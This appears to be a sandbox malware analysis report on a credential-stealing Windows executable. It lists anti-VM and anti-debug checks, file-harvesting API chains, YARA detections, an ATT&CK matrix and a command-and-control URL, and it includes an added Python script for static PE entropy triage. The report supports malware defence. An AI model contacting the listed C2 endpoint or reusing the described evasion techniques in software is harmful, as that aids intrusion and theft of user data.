                      Source: lxEu3xfjIb.exe | Static PE information: section name: .text entropy: 7.84625610084164
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX (5 identical events)
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX (50 identical events)
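
The static rows in this section (RELOCS_STRIPPED / EXECUTABLE_IMAGE / 32BIT_MACHINE, the .text section rights, the 7.846-bit .text entropy, and the on-disk vs unpacked rights string) are cheap to reproduce outside the sandbox, which is useful when you want to triage a batch of similar drops before submitting them. The script below is an added example written for this page; it is neither Joe Sandbox code nor anything from the sample. It parses a PE32 COFF header and section table, decodes the same flags the report names, computes per-section Shannon entropy, and diffs the report's rights notation. The 7.0-bit "packed" threshold and the one-section test image built inline are my own assumptions; run it with a path to check a real file.

```python
"""Static PE triage reproducing the checks behind the rows above (image
characteristics, section rights, .text entropy, on-disk vs unpacked rights).
Added example, not Joe Sandbox code; the test image is constructed inline so
the script runs offline, and the 7.0-bit threshold is an assumption."""
import math
import struct
import sys
from collections import Counter

# IMAGE_FILE_HEADER.Characteristics bits (winnt.h), the three the report lists
FILE_FLAGS = {0x0001: "RELOCS_STRIPPED", 0x0002: "EXECUTABLE_IMAGE", 0x0100: "32BIT_MACHINE"}
# IMAGE_SECTION_HEADER.Characteristics bits (winnt.h)
SECTION_FLAGS = {
    0x00000020: "IMAGE_SCN_CNT_CODE",
    0x20000000: "IMAGE_SCN_MEM_EXECUTE",
    0x40000000: "IMAGE_SCN_MEM_READ",
    0x80000000: "IMAGE_SCN_MEM_WRITE",
}
PACKED_ENTROPY = 7.0  # bits per byte; the sample's .text scored 7.846 (assumed threshold)


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty input, 8.0 for uniformly distributed bytes."""
    n = len(data)
    if n == 0:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_pe(blob: bytes) -> dict:
    """Parse the COFF header and section table of a PE32 image; enough for the
    checks the report performs, no optional-header or import parsing."""
    if blob[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    machine, nsec, _, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", blob, e_lfanew + 4)
    table = e_lfanew + 4 + 20 + opt_size
    sections = []
    for i in range(nsec):
        name, _, _, raw_size, raw_ptr, _, _, _, _, sc = struct.unpack_from("<8sIIIIIIHHI", blob, table + 40 * i)
        raw = blob[raw_ptr:raw_ptr + raw_size]
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "flags": [v for k, v in SECTION_FLAGS.items() if sc & k],
            "entropy": shannon_entropy(raw),
        })
    return {"machine": machine, "flags": [v for k, v in FILE_FLAGS.items() if chars & k], "sections": sections}


def likely_packed(pe: dict) -> list:
    """Reasons the image looks packed: stripped relocations plus any executable
    section whose entropy is above PACKED_ENTROPY."""
    reasons = []
    if "RELOCS_STRIPPED" in pe["flags"]:
        reasons.append("relocations stripped")
    for s in pe["sections"]:
        if "IMAGE_SCN_MEM_EXECUTE" in s["flags"] and s["entropy"] > PACKED_ENTROPY:
            reasons.append(f"{s['name']} is executable with entropy {s['entropy']:.3f}")
    return reasons


def perm_diff(row: str) -> dict:
    """Diff the report's '<on disk> vs <unpacked>' section-rights string and
    return {section: (disk rights, memory rights)} for every section that
    changed or exists on one side only."""
    def parse(side):
        return {n: set(p) for n, p in (e.split(":") for e in side.strip().split(";") if e)}
    disk, mem = (parse(s) for s in row.split(" vs "))
    return {n: (sorted(disk.get(n, ())), sorted(mem.get(n, ())))
            for n in sorted(disk.keys() | mem.keys()) if disk.get(n) != mem.get(n)}


def build_sample_pe(text: bytes, file_chars: int = 0x0103, text_chars: int = 0x60000020) -> bytes:
    """Constructed one-section PE32 (not the real sample) carrying `text` as .text."""
    e_lfanew, opt_size = 0x40, 224
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)  # PE32 magic
    raw_ptr = 0x200  # first 512-byte-aligned offset after the 352-byte header block
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, opt_size, file_chars)
    sect = struct.pack("<8sIIIIIIHHI", b".text", len(text), 0x1000, len(text), raw_ptr, 0, 0, 0, 0, text_chars)
    return (bytes(dos) + b"PE\0\0" + file_hdr + bytes(opt) + sect).ljust(raw_ptr, b"\0") + text


if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pe(bytes(range(256)) * 16)
    pe = parse_pe(blob)
    print("image flags:", ", ".join(pe["flags"]))
    for s in pe["sections"]:
        print(f"{s['name']:8} {s['entropy']:.3f}  {' '.join(s['flags'])}")
    print("packed indicators:", likely_packed(pe) or "none")
    print(perm_diff(".text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;"))
```

The entropy check on its own is a weak signal (compressed resources and large string tables also score high), which is why the sandbox pairs it with stripped relocations, executable section rights and the unpacked-image rights diff; the diff in particular shows the stub turning .text writable and dropping .rsrc for a .reloc, the classic footprint of a layer that rewrites its own code in place.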

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess (graph_0-46059)
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Evaded block: after key decision (graph_0-47220)
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | API coverage: 6.3 %
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_004140F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_0040E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_0040BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_0040EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_00414B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_00413B00 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_0040DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_004147C0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_0040DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_0040F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_0484E797 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_0484F087 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_0484C0A7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,memset,lstrcat,lstrcat,lstrcat,memset,lstrcat,lstrcat,lstrcat,memset,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_0484E177 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_04854357 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_04854DC7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_0484DDE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_04853D67 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_04841977 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_0484FA17 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_04854A27 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_00401160 GetSystemInfo,ExitProcess
                      Source: Amcache.hve.4.dr | Binary or memory string: VMware
                      Source: Amcache.hve.4.dr | Binary or memory string: VMware Virtual USB Mouse
                      Source: Amcache.hve.4.dr | Binary or memory string: vmci.syshbin
                      Source: Amcache.hve.4.dr | Binary or memory string: VMware, Inc.
                      Source: Amcache.hve.4.dr | Binary or memory string: VMware20,1hbin@
                      Source: Amcache.hve.4.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                      Source: Amcache.hve.4.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: Amcache.hve.4.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                      Source: lxEu3xfjIb.exe, 00000000.00000002.2288542652.0000000002CF5000.00000004.00000020.00020000.00000000.sdmp, lxEu3xfjIb.exe, 00000000.00000002.2288542652.0000000002CC4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                      Source: Amcache.hve.4.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: Amcache.hve.4.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                      Source: Amcache.hve.4.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
                      Source: Amcache.hve.4.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: Amcache.hve.4.dr | Binary or memory string: vmci.sys
                      Source: Amcache.hve.4.dr | Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                      Source: lxEu3xfjIb.exe, 00000000.00000002.2288542652.0000000002C99000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware Ng il
                      Source: Amcache.hve.4.dr | Binary or memory string: vmci.syshbin`
                      Source: Amcache.hve.4.dr | Binary or memory string: \driver\vmci,\driver\pci
                      Source: Amcache.hve.4.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: Amcache.hve.4.dr | Binary or memory string: VMware20,1
                      Source: Amcache.hve.4.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.4.dr | Binary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.4.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: lxEu3xfjIb.exe, 00000000.00000002.2288542652.0000000002C99000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
                      Source: Amcache.hve.4.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: Amcache.hve.4.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: Amcache.hve.4.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                      Source: Amcache.hve.4.dr | Binary or memory string: VMware PCI VMCI Bus Device
                      Source: Amcache.hve.4.dr | Binary or memory string: VMware VMCI Bus Device
                      Source: Amcache.hve.4.dr | Binary or memory string: VMware Virtual RAM
                      Source: Amcache.hve.4.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: Amcache.hve.4.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | API call chain: ExitProcess graph end node (graph_0-46044)
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | API call chain: ExitProcess graph end node (graph_0-46047)
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | API call chain: ExitProcess graph end node (graph_0-45886)
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | API call chain: ExitProcess graph end node (graph_0-46065)
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | API call chain: ExitProcess graph end node (graph_0-46063)
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | API call chain: ExitProcess graph end node (graph_0-46058)
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | API call chain: ExitProcess graph end node (graph_0-45932)
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | API call chain: ExitProcess graph end node (graph_0-46087)
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_00404610 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,GetProcessHeap,RtlAllocateHeap,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LdrInitializeThunk,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,strlen,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,VirtualProtect,0_2_00404610
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_0041B058 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_00404610 VirtualProtect ?,00000004,00000100,00000000
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_00419F20 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419F20
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_00419AA0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_02C236A3 push dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_04840D90 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_04859D07 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_0484092B mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_004179E0 GetProcessHeap,HeapAlloc,GetUserNameA
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_0041D21A SetUnhandledExceptionFilter
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_0041B63A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_0485D481 SetUnhandledExceptionFilter
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_0485B2BF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_0485B8A1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Memory protected: page guard

                      HIPS / PFW / Operating System Protection Evasion

Source: Yara match, File source: Process Memory Space: lxEu3xfjIb.exe PID: 1436, type: MEMORYSTR
Source: C:\Users\user\Desktop\lxEu3xfjIb.exe, Code function: 0_2_004198E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle
Source: C:\Users\user\Desktop\lxEu3xfjIb.exe, Code function: 0_2_00419790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: C:\Users\user\Desktop\lxEu3xfjIb.exe, Code function: 0_2_048599F7 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: C:\Users\user\Desktop\lxEu3xfjIb.exe, Code function: 0_2_04859B47 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle
Source: C:\Users\user\Desktop\lxEu3xfjIb.exe, Code function: 0_2_048869EF cpuid
Source: C:\Users\user\Desktop\lxEu3xfjIb.exe, Code function: 0_2_00417D20 GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree
Source: C:\Users\user\Desktop\lxEu3xfjIb.exe, Code function: 0_2_04857F87 GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree
Source: C:\Users\user\Desktop\lxEu3xfjIb.exe, Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\lxEu3xfjIb.exe, Code function: 0_2_00418CF0 GetSystemTime
Source: C:\Users\user\Desktop\lxEu3xfjIb.exe, Code function: 0_2_004179E0 GetProcessHeap,HeapAlloc,GetUserNameA
Source: C:\Users\user\Desktop\lxEu3xfjIb.exe, Code function: 0_2_00417BC0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA
Source: Amcache.hve.4.dr, Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.4.dr, Binary or memory string: msmpeng.exe
Source: Amcache.hve.4.dr, Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.4.dr, Binary or memory string: MsMpEng.exe

                      Stealing of Sensitive Information

Source: Yara match, File source: 0.3.lxEu3xfjIb.exe.4920000.1.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.lxEu3xfjIb.exe.4840e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.lxEu3xfjIb.exe.4840e67.2.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.lxEu3xfjIb.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.lxEu3xfjIb.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000000.00000002.2288542652.0000000002C99000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.2088127603.0000000004920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: lxEu3xfjIb.exe PID: 1436, type: MEMORYSTR
Source: Yara match, File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match, File source: dump.pcap, type: PCAP

                      Remote Access Functionality

Source: Yara match, File source: 0.3.lxEu3xfjIb.exe.4920000.1.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.lxEu3xfjIb.exe.4840e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.lxEu3xfjIb.exe.4840e67.2.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.lxEu3xfjIb.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.lxEu3xfjIb.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000000.00000002.2288542652.0000000002C99000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.2088127603.0000000004920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: lxEu3xfjIb.exe PID: 1436, type: MEMORYSTR
Source: Yara match, File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match, File source: dump.pcap, type: PCAP
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 12 Native API | 1 Create Account | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Virtualization/Sandbox Evasion | LSASS Memory | 31 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Disable or Modify Tools | Security Account Manager | 1 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 11 Process Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 22 Software Packing | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 133 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

Source | Detection | Scanner | Label | Link
lxEu3xfjIb.exe | 100% | Avira | HEUR/AGEN.1312571 |
lxEu3xfjIb.exe | 100% | Joe Sandbox ML | |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
https://docs.rs/getrandom#nodejs-es-module-support | 0% | URL Reputation | safe |
http://upx.sf.net | 0% | URL Reputation | safe |
No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://95.215.207.176/d8ddb681db736e16.php | true | | unknown
http://95.215.207.176/ | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
